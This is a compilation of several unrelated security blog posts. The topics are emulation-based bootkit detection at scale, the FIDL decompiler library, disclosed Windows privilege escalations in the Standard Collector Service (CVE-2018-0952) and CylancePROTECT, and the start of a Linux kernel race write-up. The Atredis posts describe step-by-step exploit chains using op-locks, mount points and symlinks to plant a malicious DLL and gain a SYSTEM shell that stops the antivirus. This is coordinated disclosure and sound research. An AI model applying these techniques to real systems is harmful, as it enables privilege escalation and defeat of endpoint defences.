
BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time, and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is at least 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)    Avg # Unique Boot Records (MD5)
100-1,000                    428
1,000-10,000                 4,738
10,000+                      8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes in the following two ranges to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.
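
To make the subsection-hash technique concrete, here is a minimal Python sketch of the calculation described above (the input file name is hypothetical, and real deployments need the per-environment offset adjustments just mentioned):

import hashlib

def mbr_subsection_hash(mbr: bytes) -> str:
    # Hash only the static code portions of a 512-byte MBR, skipping the
    # dynamic region at offsets 218-223 and everything from the disk
    # signature (offset 440) onward.
    return hashlib.md5(mbr[0:218] + mbr[224:440]).hexdigest()

with open("mbr.bin", "rb") as f:  # hypothetical sample file
    print(mbr_subsection_hash(f.read(512)))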

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.
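
As a rough illustration of what such an engine looks like, the following Python sketch uses Unicorn's bindings to emulate a boot record in 16-bit real mode and record the interrupts it raises; this is a minimal sketch, not our production engine, and the sample file name is hypothetical:

from unicorn import Uc, UcError, UC_ARCH_X86, UC_MODE_16, UC_HOOK_INTR

def hook_intr(uc, intno, events):
    # Record software interrupts (e.g., INT 13h disk services) as events
    events.append(intno)

events = []
uc = Uc(UC_ARCH_X86, UC_MODE_16)
uc.mem_map(0, 0x100000)                                # 1 MB real-mode address space
uc.mem_write(0x7C00, open("mbr.bin", "rb").read(512))  # BIOS loads MBRs at 0000:7C00h
uc.hook_add(UC_HOOK_INTR, hook_intr, events)
try:
    uc.emu_start(0x7C00, 0x7C00 + 512, timeout=5_000_000)  # 5-second cap
except UcError as e:
    print("emulation stopped:", e)                     # boot code rarely exits cleanly
print("interrupts raised:", events)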

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed for follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing each assembly instruction as it executes to ultimately arrive at the “execution hash”.


Figure 2: Execution hash
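
A minimal sketch of the idea, pairing Unicorn's code hook with the Capstone disassembler to fold each executed mnemonic into a running MD5 (the sample file name is hypothetical, and our production implementation differs in the details):

import hashlib
from unicorn import Uc, UcError, UC_ARCH_X86, UC_MODE_16, UC_HOOK_CODE
from capstone import Cs, CS_ARCH_X86, CS_MODE_16

md = Cs(CS_ARCH_X86, CS_MODE_16)
exec_hash = hashlib.md5()

def hook_code(uc, address, size, user_data):
    # Disassemble the instruction about to execute and hash its mnemonic,
    # deliberately ignoring operands (strings, offsets) that vary by sample.
    for insn in md.disasm(bytes(uc.mem_read(address, size)), address):
        exec_hash.update(insn.mnemonic.encode())

uc = Uc(UC_ARCH_X86, UC_MODE_16)
uc.mem_map(0, 0x100000)
uc.mem_write(0x7C00, open("mbr.bin", "rb").read(512))  # hypothetical sample
uc.hook_add(UC_HOOK_CODE, hook_code)
try:
    uc.emu_start(0x7C00, 0x7C00 + 512, timeout=5_000_000)
except UcError:
    pass
print("execution hash:", exec_hash.hexdigest())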

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.
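
The sketch below shows how this check can be expressed as a Unicorn memory-write hook, using the address ranges given above (as before, the sample file name is hypothetical):

from unicorn import Uc, UcError, UC_ARCH_X86, UC_MODE_16, UC_HOOK_MEM_WRITE

IVT_START, IVT_END = 0x0000, 0x03FC    # interrupt vector table (linear addresses)
BDA_START, BDA_END = 0x0400, 0x04FF    # BIOS Data Area, segment 0040h

def hook_mem_write(uc, access, address, size, value, findings):
    # Boot code has little legitimate reason to write into the IVT or BDA;
    # flag writes that could redirect INT 13h or shrink reported memory.
    if IVT_START <= address <= IVT_END:
        findings.append("IVT write: INT %02Xh vector modified" % (address // 4))
    elif BDA_START <= address <= BDA_END:
        findings.append("BDA write at linear address %#06x" % address)

findings = []
uc = Uc(UC_ARCH_X86, UC_MODE_16)
uc.mem_map(0, 0x100000)
uc.mem_write(0x7C00, open("mbr.bin", "rb").read(512))  # hypothetical sample
uc.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write, findings)
try:
    uc.emu_start(0x7C00, 0x7C00 + 512, timeout=5_000_000)
except UcError:
    pass
print("\n".join(findings) or "no IVT/BDA writes observed")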

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom-developed Raw Read kernel driver (see “Collect the Bytes” earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).
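
For illustration only, the skeleton of an analysis Lambda might look like the following Python; the bucket name, event fields, and the emulate_boot_record() helper are hypothetical stand-ins rather than our production code:

import json
import boto3

s3 = boto3.client("s3")
BUCKET = "boot-record-reports"  # hypothetical bucket name

def handler(event, context):
    # Fetch the boot record the submission Lambda stored in S3, emulate it,
    # and write the resulting report back to S3 for later retrieval.
    record_key = event["record_key"]                  # hypothetical field
    record = s3.get_object(Bucket=BUCKET, Key=record_key)["Body"].read()
    report = emulate_boot_record(record)              # hypothetical helper wrapping the emulator
    report_key = record_key + ".report.json"
    s3.put_object(Bucket=BUCKET, Key=report_key, Body=json.dumps(report).encode())
    return {"report_key": report_key}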

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage the in-house big data platform that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

FIDL: FLARE’s IDA Decompiler Library

25 November 2019 at 20:00

IDA Pro and the Hex-Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the Hex-Rays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating over this AST using a tree visitor class which visits each node in the tree and issues a callback. For every callback we can check what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

  • The order in which nodes are visited is not always obvious from the decompiler output
  • When visiting a node, we have no context about where we are in the AST
  • Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
  • The number of cases to handle when walking up or down the AST can grow exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

  • Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
  • Abstracts away the minutiae of processing the AST
  • Provides helper implementations for commonly needed functionality when working with the decompiler
  • Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object, FIDL parses the AST for us and provides a high-level summary of a function using information extracted via the decompiler, including APIs called, their parameters, and a summary of the function’s local variables and parameters.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.


Figure 1: Sample output available as part of a controlFlowinator
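
As a quick taste, constructing a controlFlowinator from IDAPython looks roughly like the sketch below; the constructor and attribute names follow FIDL's examples as best I recall, so treat them as assumptions and consult the FIDL documentation for the authoritative API:

# IDAPython: run inside IDA with Hex-Rays and FIDL installed
import idc
import FIDL.decompiler_utils as du  # module path assumed

# Build the high-level summary for the function under the cursor
c = du.controlFlowinator(ea=idc.here(), fast=False)

# Walk the call information collected during construction
for call in c.calls:  # attribute names assumed
    print(hex(call.ea), call.name, call.args)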

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.


Figure 2: The default rendering of the AST of a function


Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts to leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the Hex-Rays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.


Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress, malware commonly resolves needed imports manually by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports against pre-computed values. As an analyst, being able to quickly or automatically map these functions to their intended APIs makes it easier to identify which functions we should spend time analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.


Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.


Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings
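
To sketch the hashing arithmetic behind this kind of markup, the standalone Python snippet below builds a hash-to-name lookup table for one DLL's exports with the pefile library; the exact placement of the XOR in DRIDEX's algorithm and the example hash value are assumptions for illustration:

import zlib
import pefile

XOR_KEY = 0x65C54023

def export_hash(name: bytes) -> int:
    # CRC32 of the export name combined with the sample's XOR key; the
    # order of operations here is an assumption, not taken from the sample.
    return (zlib.crc32(name) ^ XOR_KEY) & 0xFFFFFFFF

def build_lookup(dll_path: str) -> dict:
    # Map precomputed hashes back to export names for one DLL
    pe = pefile.PE(dll_path)
    return {export_hash(exp.name): exp.name.decode()
            for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols if exp.name}

lookup = build_lookup(r"C:\Windows\System32\kernel32.dll")
print(lookup.get(0x12345678, "unknown"))  # hypothetical hash value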

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which addresses this by reducing the amount of low-level detail an analyst needs to understand in order to create a script leveraging the decompiler, and which should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service

21 August 2018 at 20:50

If you aren't interested in the adventure behind this bug hunt, ATREDIS-2018-0004 is a good TL;DR and here is the Proof-of-Concept.

Process Monitor has become a favorite tool of mine for both research and development. During development of offensive security tools, I frequently use it to monitor how the tools interact with Windows and how they might be detected. Earlier this year I noticed some interesting behavior while I was debugging some code in Visual Studio and monitoring with Procmon. Normally I set up exclusion filters for Visual Studio processes to reduce the noise, but prior to setting up the filters I noticed a SYSTEM process writing to a user-owned directory:

StandardCollector.Service.exe writing to user Temp folder

When a privileged service writes to a user-owned resource, it opens up the possibility of a symlink attack vector, as previously shown in the Cylance privilege escalation bug I found. With the goal of identifying how I could directly influence the service's behavior, I began my research into the Standard Collector Service by reviewing the service's loaded libraries:

Visual Studio DLLs loaded by StandardCollector.Service.exe

The library paths indicated the Standard Collector Service was part of Visual Studio's diagnostics tools. After reviewing the libraries and executables in the related folders, I identified that several of the binaries were written in .NET, including a standalone CLI tool named VSDiagnostics.exe; here is the console output:

Help output from VSDiagnostics CLI tool

Loading VSDiagnostics into dnSpy revealed a lot about the tool as well as how it interacts with the Standard Collector Service. First, an instance of IStandardCollectorService is acquired and a session configuration is used to create an ICollectionSession:

Initial steps for configuring diagnostics collection session

Next, agents are added to the ICollectionSession with a CLSID and DLL name, which also stood out as interesting user-controlled behavior. It also reminded me of previous research that exploited this exact DLL loading behavior. At this point, it looked like the Visual Studio Standard Collector Service was very similar to, or the same as, the Diagnostics Hub Standard Collector Service included with Windows 10. I began investigating this assumption by using OleViewDotNet to query the services for their supported interfaces:

Windows Diagnostics Hub Standard Collector Service in OleViewDotNet

Viewing the proxy definition of the IStandardCollectorService revealed other familiar interfaces, specifically the ICollectionSession interface seen in the VSDiagnostics source:

ICollectionSession interface definition in OleViewDotNet

Taking note of the Interface ID ("IID"), I returned to the .NET interop library to compare the IIDs and found that they were different:

Visual Studio ICollectionSession definition with different IID

Looking deeper into the .NET code, I found that these Visual Studio specific interfaces are loaded through the proxy DLLs:

VSDiagnostics.exe function to Load Proxy Stub DLLs

A quick review of the ManualRegisterInterfaces function in the DiagnosticsHub.StandardCollector.Proxy.dll showed a simple loop that iterates over an array of IIDs. Included in the array of IIDs is one belonging to the ICollectionSession:

ManualRegisterInterfaces function of proxy stub DLL

Visual Studio ICollectionSession IID in array of IIDs to register

After I had a better understanding of the Visual Studio Collector service, I wanted to see if I could reuse the same .NET interop code to control the Windows Collector service. In order to interact with the correct service, I had to replace the Visual Studio CLSIDs and IIDs with the correct Windows Collector service CLSIDs and IIDs. Next, I used the modified code to build a client that simply created and started a diagnostics session with the collector service:

Code snippet of client used to interact with Collector service

Starting Procmon and running the client resulted in several files and folders being created in the specified C:\Temp scratch directory. Analyzing these events in Procmon showed that the initial directory creation was performed with client impersonation:

Session folder created in scratch directory with impersonation

Although the initial directory was created while impersonating the client, the subsequent files and folders were created without impersonation:

Folder created without impersonation

After taking a deeper look at the other file operations, several stood out. The image below is an annotated breakdown of the various file operations performed by the Standard Collector Service:

Various file operations performed by Standard Collector Service

The most interesting behavior is the file copy operation that occurs during the diagnostics report creation. The image below shows the corresponding call stack and events of this behavior:

CopyFile operation performed by the Standard Collector Service

Now that I had identified user-influenced behaviors, I constructed a possible arbitrary file creation exploit plan:

  1. Obtain op-lock on merged ETL file ({GUID}.1.m.etl) as soon as service calls CloseFile
  2. Find and convert report sub-folder as mount point to C:\Windows\System32
  3. Replace contents of {GUID}.1.m.etl with malicious DLL
  4. Release op-lock to allow ETL file to be copied through the mount point
  5. Start new collection session with copied ETL as agent DLL, triggering elevated code execution

To write the exploit, I extended the client from earlier by leveraging James Forshaw's NtApiDotNet C# library to programmatically create the op-lock and mount point. The images below show the code snippet used to acquire the op-lock and the corresponding Procmon output illustrating the loop and op-lock acquisition:

Code snippet used to acquire op-lock on .etl file

Winning race condition with op-lock

Acquiring an op-lock on the file essentially stops the CopyFile race, allows the contents to be overwritten, and provides control over when the CopyFile occurs. Next, the exploit looks for the Report folder and scans it for the randomly named sub-directory that needs to be converted to a mount point. Once the mount point is successfully created, the contents of the .etl file are replaced with a malicious DLL. Finally, the .etl file is closed and the op-lock is released, allowing the CopyFile operation to continue. The code snippet and Procmon output for this step are shown in the images below:

Code snippet that creates mount point, overwrites .etl file, and releases op-lock

Procmon output for arbitrary file write through mount point folder

There are several techniques for escalating privileges through an arbitrary file write, but for this exploit I chose to use the Collector service's agent DLL loading capability to keep everything isolated to a single service. You'll notice in the image above that I did not use the mount point + symlink trick to rename the file to a .dll, because DLLs can be loaded with any extension. For the purposes of this exploit, the DLL simply needed to be in the System32 folder for the Collector service to load it. The image below demonstrates successful execution of the exploit and the corresponding Procmon output:

SystemCollector.exe exploit PoC output

Procmon output of successful exploitation

I know that the above screenshots show the exploit being run as the user "Admin", so here is a GIF showing it being run as "bob", a low-privileged user account:

Running exploit as low-privileged user

Feel free to try out the SystemCollector PoC yourself. Turning the PoC into a portable exploit for offensive security engagements is a task I'll leave to the reader. The NtApiDotNet library is also a PowerShell module, which should make things a bit easier.

After this bug was patched as part of the August 2018 Patch Tuesday, I began reversing the patch, which was relatively simple. As expected, the patch simply added CoImpersonateClient calls prior to the previously vulnerable file operations, specifically in the CommitPackagingResult function in DiagnosticsHub.StandardCollector.Runtime.dll:

Report folder being created with impersonation

CoImpersonateClient added to CommitPackagingResult in DiagnosticsHub.StandardCollector.Runtime.dll

As previously mentioned in the Cylance privilege escalation write-up, protecting against symlink attacks may seem easy, but it is often overlooked. Any time a privileged service performs file operations on behalf of a user, proper impersonation is needed in order to prevent these types of attacks.

Upon finding this vulnerability, MSRC was contacted with the vulnerability details and PoC. MSRC quickly triaged and validated the finding and provided regular updates throughout the remediation process. The full disclosure timeline can be found in the Atredis advisory link below.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0004

The CVE assigned to this vulnerability is: CVE-2018-0952


Escalating Privileges with CylancePROTECT

1 May 2018 at 19:23

If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've run into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.

After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try and make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I started by firing up dnSpy, loading the assemblies, and looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.

Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced

CylanceUI Advanced Menu

Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get a high-level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in Procmon because it caused the CyUpdate process to spawn as SYSTEM.

CyUpdate Spawning as SYSTEM

The Procmon output I witnessed at this point told me quite a bit and made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:

  1. As a user, I could communicate with the CylanceSvc service and influence its behavior
  2. As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
  3. As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process

CylanceUI and CylanceSvc writing to log

CyUpdate writing to log

The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:

Log folder and File Modify Permissions

Having modify permissions on a folder allows it to be set up as a mount point to redirect read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as to try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT’s log level to 'Error' to prevent additional logs from being created after I emptied the log folder.

Log folder mount point created

After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.

CylanceSvc writing log to C:\Windows\

CyUpdate change log file permissions

Log file modify permissions

Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are set up like this:

  1. C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
  2. \RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll

One of James' symbolic link testing tools will automatically create this symlink chain when given the original file and target destination. In this case the command was CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll, and the result was:

Creating symlink chain to control filename

File with arbitrary name created in C:\Windows

At this point I had written a file to an arbitrary location with an arbitrary name, and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.

Contents of C:\Windows\evil.dll

Verifying overwrite permissions

From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:

  1. Path contains .dll
  2. Result contains NOT
  3. Process is CyUpdate.exe

The resulting output in procmon looked like this:

libc.dll hijack identified in procmon

Now all I had to do was set up the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:

Gaining SYSTEM shell and stopping CylanceSvc

Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.

Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.

Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard to spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are minimal.

Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.

The CVE assigned to this vulnerability is: CVE-2018-10722


Racing against the clock -- hitting a tiny kernel race window

By: Ryan
24 March 2022 at 20:51

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

